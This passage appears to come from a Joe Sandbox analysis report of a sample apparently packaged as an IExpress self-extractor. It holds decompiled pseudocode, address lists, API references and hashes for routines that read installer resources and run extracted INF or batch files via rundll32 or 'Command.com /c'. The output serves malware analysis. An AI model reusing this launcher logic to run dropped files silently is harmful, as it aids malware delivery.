                                                                                                                                                                                                        						_t146 = 0x104;
                                                                                                                                                                                                        						E001F1781( &_v276, 0x104, _t130, 0x1f8c42);
                                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t130 = "REBOOT";
                                                                                                                                                                                                        				_t125 = E001F468F(_t130, 0x1f9a2c, 4);
                                                                                                                                                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
                                                                                                                                                                                                        0x001f3f63
                                                                                                                                                                                                        0x001f3dbc
                                                                                                                                                                                                        0x001f3dc0
                                                                                                                                                                                                        0x001f3dc2
                                                                                                                                                                                                        0x001f3de6
                                                                                                                                                                                                        0x001f3de6
                                                                                                                                                                                                        0x001f3de8
                                                                                                                                                                                                        0x001f3f0b
                                                                                                                                                                                                        0x001f3f0b
                                                                                                                                                                                                        0x001f3f0f
                                                                                                                                                                                                        0x001f3f13
                                                                                                                                                                                                        0x001f3f15
                                                                                                                                                                                                        0x001f3f1a
                                                                                                                                                                                                        0x001f3f1c
                                                                                                                                                                                                        0x001f3f46
                                                                                                                                                                                                        0x001f3f47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3f47
                                                                                                                                                                                                        0x001f3f1e
                                                                                                                                                                                                        0x001f3f1f
                                                                                                                                                                                                        0x001f3f25
                                                                                                                                                                                                        0x001f3f26
                                                                                                                                                                                                        0x001f3f2a
                                                                                                                                                                                                        0x001f3f2d
                                                                                                                                                                                                        0x001f3fd9
                                                                                                                                                                                                        0x001f3fd9
                                                                                                                                                                                                        0x001f3fda
                                                                                                                                                                                                        0x001f3fda
                                                                                                                                                                                                        0x001f3fe1
                                                                                                                                                                                                        0x001f3fe3
                                                                                                                                                                                                        0x001f3fe3
                                                                                                                                                                                                        0x001f3fe8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3fe8
                                                                                                                                                                                                        0x001f3f33
                                                                                                                                                                                                        0x001f3f37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3f37
                                                                                                                                                                                                        0x001f3dee
                                                                                                                                                                                                        0x001f3dee
                                                                                                                                                                                                        0x001f3df5
                                                                                                                                                                                                        0x001f3fad
                                                                                                                                                                                                        0x001f3fb9
                                                                                                                                                                                                        0x001f3fc2
                                                                                                                                                                                                        0x001f3fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3fc8
                                                                                                                                                                                                        0x001f3dfb
                                                                                                                                                                                                        0x001f3dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3e03
                                                                                                                                                                                                        0x001f3e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3e15
                                                                                                                                                                                                        0x001f3e17
                                                                                                                                                                                                        0x001f3e19
                                                                                                                                                                                                        0x001f3f94
                                                                                                                                                                                                        0x001f3fa4
                                                                                                                                                                                                        0x001f3f7c
                                                                                                                                                                                                        0x001f3f80
                                                                                                                                                                                                        0x001f3f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3f8b
                                                                                                                                                                                                        0x001f3e2c
                                                                                                                                                                                                        0x001f3e30
                                                                                                                                                                                                        0x001f3e34
                                                                                                                                                                                                        0x001f3e36
                                                                                                                                                                                                        0x001f3f69
                                                                                                                                                                                                        0x001f3f6e
                                                                                                                                                                                                        0x001f3f70
                                                                                                                                                                                                        0x001f3f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3f76
                                                                                                                                                                                                        0x001f3e3c
                                                                                                                                                                                                        0x001f3e43
                                                                                                                                                                                                        0x001f3e47
                                                                                                                                                                                                        0x001f3e52
                                                                                                                                                                                                        0x001f3e56
                                                                                                                                                                                                        0x001f3e5c
                                                                                                                                                                                                        0x001f3e61
                                                                                                                                                                                                        0x001f3e68
                                                                                                                                                                                                        0x001f3e70
                                                                                                                                                                                                        0x001f3e74
                                                                                                                                                                                                        0x001f3e7c
                                                                                                                                                                                                        0x001f3e80
                                                                                                                                                                                                        0x001f3e82
                                                                                                                                                                                                        0x001f3e82
                                                                                                                                                                                                        0x001f3e87
                                                                                                                                                                                                        0x001f3e87
                                                                                                                                                                                                        0x001f3e8b
                                                                                                                                                                                                        0x001f3e91
                                                                                                                                                                                                        0x001f3e94
                                                                                                                                                                                                        0x001f3e96
                                                                                                                                                                                                        0x001f3e96
                                                                                                                                                                                                        0x001f3e9b
                                                                                                                                                                                                        0x001f3e9b
                                                                                                                                                                                                        0x001f3e9f
                                                                                                                                                                                                        0x001f3ea2
                                                                                                                                                                                                        0x001f3ea4
                                                                                                                                                                                                        0x001f3ea4
                                                                                                                                                                                                        0x001f3ea9
                                                                                                                                                                                                        0x001f3ea9
                                                                                                                                                                                                        0x001f3ead
                                                                                                                                                                                                        0x001f3eb3
                                                                                                                                                                                                        0x001f3eb6
                                                                                                                                                                                                        0x001f3eb8
                                                                                                                                                                                                        0x001f3eb8
                                                                                                                                                                                                        0x001f3ebd
                                                                                                                                                                                                        0x001f3ebd
                                                                                                                                                                                                        0x001f3ec1
                                                                                                                                                                                                        0x001f3ec3
                                                                                                                                                                                                        0x001f3ec5
                                                                                                                                                                                                        0x001f3ec5
                                                                                                                                                                                                        0x001f3eca
                                                                                                                                                                                                        0x001f3eca
                                                                                                                                                                                                        0x001f3ece
                                                                                                                                                                                                        0x001f3ed5
                                                                                                                                                                                                        0x001f3ed9
                                                                                                                                                                                                        0x001f3ee0
                                                                                                                                                                                                        0x001f3ee6
                                                                                                                                                                                                        0x001f3eea
                                                                                                                                                                                                        0x001f3eec
                                                                                                                                                                                                        0x001f3eee
                                                                                                                                                                                                        0x001f3ef3
                                                                                                                                                                                                        0x001f3ef3
                                                                                                                                                                                                        0x001f3ef5
                                                                                                                                                                                                        0x001f3efa
                                                                                                                                                                                                        0x001f3efb
                                                                                                                                                                                                        0x001f3efd
                                                                                                                                                                                                        0x001f3f40

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F3C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 001F3CDC
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,001F8C42), ref: 001F3D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 001F3E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,001F8C42), ref: 001F3EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,001F8C42), ref: 001F3F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,001F8C42), ref: 001F3F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,001F8C42), ref: 001F3F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,001F8C42), ref: 001F3F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,001F8C42), ref: 001F3F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,001F8C42), ref: 001F3FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                        • API String ID: 1032054927-2481547932
                                                                                                                                                                                                        • Opcode ID: e6d0b72c70fb01e3b2282da4bddea3fd9929b5b612b49e0566f5dd8ce7b1c278
                                                                                                                                                                                                        • Instruction ID: fce6dfe08efc8ba554b0cbe7e35705257517e37f13d3cc16250e8bf994506f65
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6d0b72c70fb01e3b2282da4bddea3fd9929b5b612b49e0566f5dd8ce7b1c278
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FCB1F2B06083099BE720EF64D845B7B77E4EF84710F10092EFBA5D6290DB75CA85CB62
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph (function 001F1AE8; graph image not reproduced)
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E001F1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v527;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				char _v1552;
                                                                                                                                                                                                        				CHAR* _v1556;
                                                                                                                                                                                                        				int* _v1560;
                                                                                                                                                                                                        				CHAR** _v1564;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				CHAR* _t53;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				CHAR* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				signed char _t65;
                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                        				unsigned int _t85;
                                                                                                                                                                                                        				CHAR* _t90;
                                                                                                                                                                                                        				CHAR* _t92;
                                                                                                                                                                                                        				char _t105;
                                                                                                                                                                                                        				char _t106;
                                                                                                                                                                                                        				CHAR** _t111;
                                                                                                                                                                                                        				CHAR* _t115;
                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                        				CHAR* _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				intOrPtr* _t146;
                                                                                                                                                                                                        				char* _t148;
                                                                                                                                                                                                        				CHAR* _t151;
                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                        				CHAR* _t155;
                                                                                                                                                                                                        				CHAR* _t156;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				signed int _t158;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t48 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                        				_t108 = __ecx;
                                                                                                                                                                                                        				_v1564 = _a4;
                                                                                                                                                                                                        				_v1560 = _a8;
                                                                                                                                                                                                        				E001F1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                        				if(_v528 != 0x22) {
                                                                                                                                                                                                        					_t135 = " ";
                                                                                                                                                                                                        					_t53 =  &_v528;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t135 = "\"";
                                                                                                                                                                                                        					_t53 =  &_v527;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t111 =  &_v1556;
                                                                                                                                                                                                        				_v1556 = _t53;
                                                                                                                                                                                                        				_t54 = E001F1A84(_t111, _t135);
                                                                                                                                                                                                        				_t156 = _v1556;
                                                                                                                                                                                                        				_t151 = _t54;
                                                                                                                                                                                                        				if(_t156 == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_push(_t111);
                                                                                                                                                                                                        					E001F1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        					E001F658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t132 = _t156;
                                                                                                                                                                                                        					_t148 =  &(_t132[1]);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t105 =  *_t132;
                                                                                                                                                                                                        						_t132 =  &(_t132[1]);
                                                                                                                                                                                                        					} while (_t105 != 0);
                                                                                                                                                                                                        					_t111 = _t132 - _t148;
                                                                                                                                                                                                        					if(_t111 < 3) {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t106 = _t156[1];
                                                                                                                                                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						E001F1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t138 = 0x2e;
                                                                                                                                                                                                        						_t57 = E001F66C8(_t156, _t138);
                                                                                                                                                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                        							_t139 = 0x2e;
                                                                                                                                                                                                        							_t115 = _t156;
                                                                                                                                                                                                        							_t58 = E001F66C8(_t115, _t139);
                                                                                                                                                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									goto L43;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                        									E001F1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_push(_t115);
                                                                                                                                                                                                        									_t108 = 0x400;
                                                                                                                                                                                                        									E001F1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                        										E001F16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                        										E001F16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = _t156;
                                                                                                                                                                                                        								 *_t156 = 0;
                                                                                                                                                                                                        								E001F2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                        								goto L53;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t108 = "Command.com /c %s";
                                                                                                                                                                                                        								_t125 = "Command.com /c %s";
                                                                                                                                                                                                        								_t145 = _t125 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t76 =  *_t125;
                                                                                                                                                                                                        									_t125 = _t125 + 1;
                                                                                                                                                                                                        								} while (_t76 != 0);
                                                                                                                                                                                                        								_t126 = _t125 - _t145;
                                                                                                                                                                                                        								_t146 =  &_v268;
                                                                                                                                                                                                        								_t157 = _t146 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t77 =  *_t146;
                                                                                                                                                                                                        									_t146 = _t146 + 1;
                                                                                                                                                                                                        								} while (_t77 != 0);
                                                                                                                                                                                                        								_t140 = _t146 - _t157;
                                                                                                                                                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                        								if(_t156 != 0) {
                                                                                                                                                                                                        									E001F171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                        									goto L53;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L43;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
				_t85 = GetFileAttributesA( &_v268);
				if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
					_t140 = 0x525;
					_push(0);
					_push(0x10);
					_push(0);
					_t60 =  &_v268;
					goto L35;
				} else {
					_t140 = "[";
					_v1556 = _t151;
					_t90 = E001F1A84( &_v1556, "[");
					if(_t90 != 0) {
						if( *_t90 != 0) {
							_v1556 = _t90;
						}
						_t140 = "]";
						E001F1A84( &_v1556, "]");
					}
					_t156 = LocalAlloc(0x40, 0x200);
					if(_t156 == 0) {
						L43:
						_t60 = 0;
						_t140 = 0x4b5;
						_push(0);
						_push(0x10);
						_push(0);
						L35:
						_push(_t60);
						E001F44B9(0, _t140);
						_t62 = 0;
						goto L54;
					} else {
						_t155 = _v1556;
						_t92 = _t155;
						if( *_t155 == 0) {
							_t92 = "DefaultInstall";
						}
						*0x1f9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
						*_v1560 = 1;
						if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x1f1140, _t156, 8,  &_v268) == 0) {
							*0x1f9a34 =  *0x1f9a34 & 0xfffffffb;
							if( *0x1f9a40 != 0) {
								_t108 = "setupapi.dll";
							} else {
								_t108 = "setupx.dll";
								GetShortPathNameA( &_v268,  &_v268, 0x104);
							}
							if( *_t155 == 0) {
								_t155 = "DefaultInstall";
							}
							_push( &_v268);
							_push(_t155);
							E001F171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
						} else {
							*0x1f9a34 =  *0x1f9a34 | 0x00000004;
							if( *_t155 == 0) {
								_t155 = "DefaultInstall";
							}
							E001F1680(_t108, 0x104, _t155);
							_t140 = 0x200;
							E001F1680(_t156, 0x200,  &_v268);
						}
						L53:
						_t62 = 1;
						*_v1564 = _t156;
						L54:
						_pop(_t152);
						return E001F6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
					}
				}
			}
		}
	}
}
                                                                                                                                                                                                        0x001f1dd2
                                                                                                                                                                                                        0x001f1deb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1df0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1dd2
                                                                                                                                                                                                        0x001f1bf7
                                                                                                                                                                                                        0x001f1bfe
                                                                                                                                                                                                        0x001f1c07
                                                                                                                                                                                                        0x001f1d55
                                                                                                                                                                                                        0x001f1d5a
                                                                                                                                                                                                        0x001f1d5b
                                                                                                                                                                                                        0x001f1d5d
                                                                                                                                                                                                        0x001f1d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1c1b
                                                                                                                                                                                                        0x001f1c1b
                                                                                                                                                                                                        0x001f1c20
                                                                                                                                                                                                        0x001f1c2c
                                                                                                                                                                                                        0x001f1c33
                                                                                                                                                                                                        0x001f1c38
                                                                                                                                                                                                        0x001f1c3a
                                                                                                                                                                                                        0x001f1c3a
                                                                                                                                                                                                        0x001f1c40
                                                                                                                                                                                                        0x001f1c4b
                                                                                                                                                                                                        0x001f1c4b
                                                                                                                                                                                                        0x001f1c5d
                                                                                                                                                                                                        0x001f1c61
                                                                                                                                                                                                        0x001f1dd4
                                                                                                                                                                                                        0x001f1dd4
                                                                                                                                                                                                        0x001f1dd6
                                                                                                                                                                                                        0x001f1ddb
                                                                                                                                                                                                        0x001f1ddc
                                                                                                                                                                                                        0x001f1dde
                                                                                                                                                                                                        0x001f1d64
                                                                                                                                                                                                        0x001f1d64
                                                                                                                                                                                                        0x001f1d67
                                                                                                                                                                                                        0x001f1d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1c67
                                                                                                                                                                                                        0x001f1c67
                                                                                                                                                                                                        0x001f1c6d
                                                                                                                                                                                                        0x001f1c72
                                                                                                                                                                                                        0x001f1c74
                                                                                                                                                                                                        0x001f1c74
                                                                                                                                                                                                        0x001f1c8e
                                                                                                                                                                                                        0x001f1c99
                                                                                                                                                                                                        0x001f1cc0
                                                                                                                                                                                                        0x001f1cf8
                                                                                                                                                                                                        0x001f1d07
                                                                                                                                                                                                        0x001f1d23
                                                                                                                                                                                                        0x001f1d09
                                                                                                                                                                                                        0x001f1d14
                                                                                                                                                                                                        0x001f1d1b
                                                                                                                                                                                                        0x001f1d1b
                                                                                                                                                                                                        0x001f1d2b
                                                                                                                                                                                                        0x001f1d2d
                                                                                                                                                                                                        0x001f1d2d
                                                                                                                                                                                                        0x001f1d38
                                                                                                                                                                                                        0x001f1d39
                                                                                                                                                                                                        0x001f1d46
                                                                                                                                                                                                        0x001f1cc2
                                                                                                                                                                                                        0x001f1cc2
                                                                                                                                                                                                        0x001f1ccc
                                                                                                                                                                                                        0x001f1cce
                                                                                                                                                                                                        0x001f1cce
                                                                                                                                                                                                        0x001f1cdb
                                                                                                                                                                                                        0x001f1ce6
                                                                                                                                                                                                        0x001f1cee
                                                                                                                                                                                                        0x001f1cee
                                                                                                                                                                                                        0x001f1e89
                                                                                                                                                                                                        0x001f1e91
                                                                                                                                                                                                        0x001f1e92
                                                                                                                                                                                                        0x001f1e94
                                                                                                                                                                                                        0x001f1e97
                                                                                                                                                                                                        0x001f1ea4
                                                                                                                                                                                                        0x001f1ea4
                                                                                                                                                                                                        0x001f1c61
                                                                                                                                                                                                        0x001f1c07
                                                                                                                                                                                                        0x001f1bd3
                                                                                                                                                                                                        0x001f1b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 001F1BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 001F1BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 001F1C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 001F1C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,001F1140,00000000,00000008,?), ref: 001F1CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 001F1D1B
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-852641736
                                                                                                                                                                                                        • Opcode ID: 2f3dc5e4f77ba5f77735fe6b66f7c199b4c93924c7ad69c20fbd8cf206bbcf1d
                                                                                                                                                                                                        • Instruction ID: 56ba039dcf8e1a49aff38209634004c29998a884eb7566470b6fb685943be930
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f3dc5e4f77ba5f77735fe6b66f7c199b4c93924c7ad69c20fbd8cf206bbcf1d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60A1F6B0A0421CFBEB20DB24CC45BFA77799B91320F144295EB55E32D1DBB59D85CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E001F2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                                                        				_t9 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                        				if( *0x1f8a38 != 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					_t11 = E001F5164(_t52);
                                                                                                                                                                                                        					_t53 = _t11;
                                                                                                                                                                                                        					if(_t11 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						return E001F6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t14 = E001F55A0(_t53); // executed
                                                                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t45 = 0x105;
                                                                                                                                                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                        						_t43 = 0x105;
                                                                                                                                                                                                        						_t40 =  &_v272;
                                                                                                                                                                                                        						E001F658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                        						_t44 = 0;
                                                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                        							_v276 = _t31;
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								_t45 = _t47;
                                                                                                                                                                                                        								_t40 = _t31;
